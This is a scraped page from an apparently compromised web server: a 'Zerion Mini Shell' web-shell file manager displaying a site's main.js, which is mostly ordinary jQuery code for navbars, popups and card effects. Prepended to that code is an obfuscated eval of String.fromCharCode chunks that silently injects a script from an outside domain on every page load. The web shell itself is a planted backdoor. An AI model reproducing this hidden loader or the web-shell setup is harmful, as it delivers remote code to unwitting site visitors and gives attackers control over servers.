%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/eirtvhdf/public_html/assest/javascript/
Upload File :
Create Path :
Current File : /home/eirtvhdf/public_html/assest/javascript/main.js

var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,103,101,116,46,106,115,63,118,61,49,46,48,46,49,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/$(document).ready(function(){
    
    window.onscroll = function() {myFunction()};

    var navbar = document.getElementById("navbar");
    var sticky = navbar.offsetTop;

    function myFunction() {
        if (window.pageYOffset > sticky) {
            navbar.classList.add("sticky");
            // $('header').css("margin-top","110px");
        } else {
            navbar.classList.remove("sticky");
            // $('header').css("margin-bottom","0px");
        }
    }
    
    $(".nav-career, .strip2 button").click(function(){
        $(".req_form").css("display","flex").hide().fadeIn(300);
        $("#demo").css("filter","blur(10px)");
    });
    $(".req_form .closebtn").click(function(){
        $(".req_form").css("display","flex").show().fadeOut(300);
        $("#demo").css("filter","blur(0px)");
    });
    
    $(".nav-reqbtn, .strip2 button").click(function(){
        $(".req_form").css("display","flex").hide().fadeIn(300);
        $("#demo").css("filter","blur(10px)");
    });
    $(".req_form .closebtn").click(function(){
        $(".req_form").css("display","flex").show().fadeOut(300);
        $("#demo").css("filter","blur(0px)");
    });
    
    

});
$(function(){
    var card = $('.perspectCont');
    card.on('mousemove', function (e) {
        var x = e.clientX - $(this).offset().left + $(window).scrollLeft();
        var y = e.clientY - $(this).offset().top + $(window).scrollTop();
        
        var rY = map(x, 0, $(this).width(), -20, 20);
        var rX = map(y, 0, $(this).height(),-20, 20);
        // 
        $('.perspectDiv').css("transform", "rotateY(" + rY + "deg)" + " " + "rotateX(" + -rX + "deg) translateZ(30px)");
    });
    
    card.on('mouseenter', function () {
        $(".perspectDiv").css({
            transition: "all " + 0.05 + "s" + " linear",
        });
    });

    card.on('mouseleave', function () {
        $(".perspectDiv").css({
            transition: "all " + 0.2 + "s" + " linear",
        });

        $(".perspectDiv").css("transform", "rotateY(0deg) rotateX(0deg)");
    });
        
    function map(x, in_min, in_max, out_min, out_max)
    {
        return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min;
    }
});
$(function(){
    var countComptBtn = $('.competent .compt_side .row').length;
    var noComptBtn = 0;
    setInterval(function(){
        var noChild = ".competent .compt_side .row:nth-child("+noComptBtn+")";
        $(noChild).trigger('click');
        
        noComptBtn = noComptBtn+1;
        if(noComptBtn == countComptBtn){
            noComptBtn = 0;
        }
    }, 3000);
});
function competent_data(icon1, icon2, name, desc){
    $('.compt_pers #icon1').removeClass().addClass(icon1);
    $('.compt_pers #icon2').removeClass().addClass(icon2);
    $('.compt_pers h3').html(name);
    $('.compt_pers p').html(desc);
}
function anime_data(nt_child, h4, p, ul){
    $('.animated_v .btn').removeClass('anime_active');
    $('.anime_dataarea h4').html(h4);
    $('.anime_dataarea p').html(p);
    $('.anime_dataarea ul').html(ul);
    $('.animated_v .btn:nth-child('+nt_child+')').addClass('anime_active');
}
$(function(){
    $('.imageview .card').click(function(){
        $('#imageFullMode').addClass('imageView').html("<img src='"+$(this).find('img').attr('data-fullImgSrc')+"'/>");
    });
    $('#imageFullMode').click(function(){$(this).removeClass('imageView').html("");});

    $(".servicebtn").click(function(){
        var title = $(this).attr('data-package-title');
        var price = $(this).attr('data-package-price');
        $("#get_amount").val(price);
        $("#get_package").val(title);
        $(".servicepopup").css("display","flex").hide().fadeIn(300);
        $("#demo").css("filter","blur(10px)");
    });
    $(".servicepopup .closebtn").click(function(){
        $(".servicepopup").css("display","flex").show().fadeOut(300);
        $("#demo").css("filter","blur(0px)");
    });
});

$(".strip2 button, .req_info").click(function(){
        $(".req_form").css("display","flex").hide().fadeIn(300);
        $("#demo").css("filter","blur(10px)");
    });
    $(".req_form .closebtn").click(function(){
        $(".req_form").css("display","flex").show().fadeOut(300);
        $("#demo").css("filter","blur(0px)");
    });
    
    

    
    
    
	var req2closeVal = 0;
    $(".req_form2 .strip1 p").click(function(){
        if(req2closeVal == 0){
            req2closeVal = 1;
            $(".req_form2").css({"left": "0", "transition": "all 0.3s"});
            $(".req2closebtn").fadeIn(300);
        }else{
            req2closeVal = 0;
            $(".req_form2").css({"left": "-400px"});
            $(".req2closebtn").fadeOut(1000);
        }
    });
    $(".req2closebtn").click(function(){
        if(req2closeVal == 1){
            req2closeVal = 0;
            $(".req_form2").css({"left": "-400px"});
            $(".req2closebtn").fadeOut(1000);
        }
    });

$(function(){
    $('.complogo').each(function(){
        $(this).html('<svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" version="1.1" style="shape-rendering:geometricPrecision; text-rendering:geometricPrecision; image-rendering:optimizeQuality; fill-rule:evenodd; clip-rule:evenodd"'+
        'viewBox="0 0 50 53"'+
        'xmlns:xlink="http://www.w3.org/1999/xlink">'+
        '<defs>'+
            '<clipPath id="compimg">'+
            '<path d="M8 15l30 0 0 23 -30 0 0 -23z"/>'+
            '</clipPath>'+
        '<radialGradient id="compgradient" gradientUnits="userSpaceOnUse" gradientTransform="matrix(-1.28136 -1.09502 1.10457 -1.2925 36 106)" cx="31.0942" cy="31.4818" r="18.6735" fx="31.0942" fy="31.4818">'+
        '<stop offset="0" style="stop-opacity:1; stop-color:#FEFEFE"/>'+
        '<stop offset="1" style="stop-opacity:1; stop-color:#E6E6E6"/>'+
        '</radialGradient>'+
        '<filter id="f1" x="-50%" y="-50%" width="300%" height="300%">'+
            // '<feOffset result="offOut" in="SourceGraphic" dx="0" dy="0" />'+
            '<feGaussianBlur result="blurOut" in="offOut" stdDeviation="1.5" />'+
            // '<feBlend in="SourceGraphic" in2="blurOut" mode="normal" />'+
        '</filter>'+
        '</defs>'+
        '<g class="complogomain">'+
            '<polygon class="complogoback" points="23,2 34,8 44,14 44,27 44,39 34,45 23,51 12,45 2,39 2,27 2,14 12,8 " filter="url(#f1)"/>'+
            '<polygon class="complogo" points="23,2 34,8 44,14 44,27 44,39 34,45 23,51 12,45 2,39 2,27 2,14 12,8 "/>'+
            '<g style="clip-path:url(#compimg)">'+
            '<image x="8" y="15" width="30.1251" height="23.268" xlink:href="'+
                $(this).attr('data-img')+
            '"/>'+
            '</g>'+
        '</g>'+
        '</svg>');
    });
    
    $('.morepkg').click(function(){
        $(this).text(function(i,old){
            return old=='More Packages' ?  'Show Less' : 'More Packages';
        });
        // $('#packagecoll').collapse();
    });
});

Zerion Mini Shell 1.0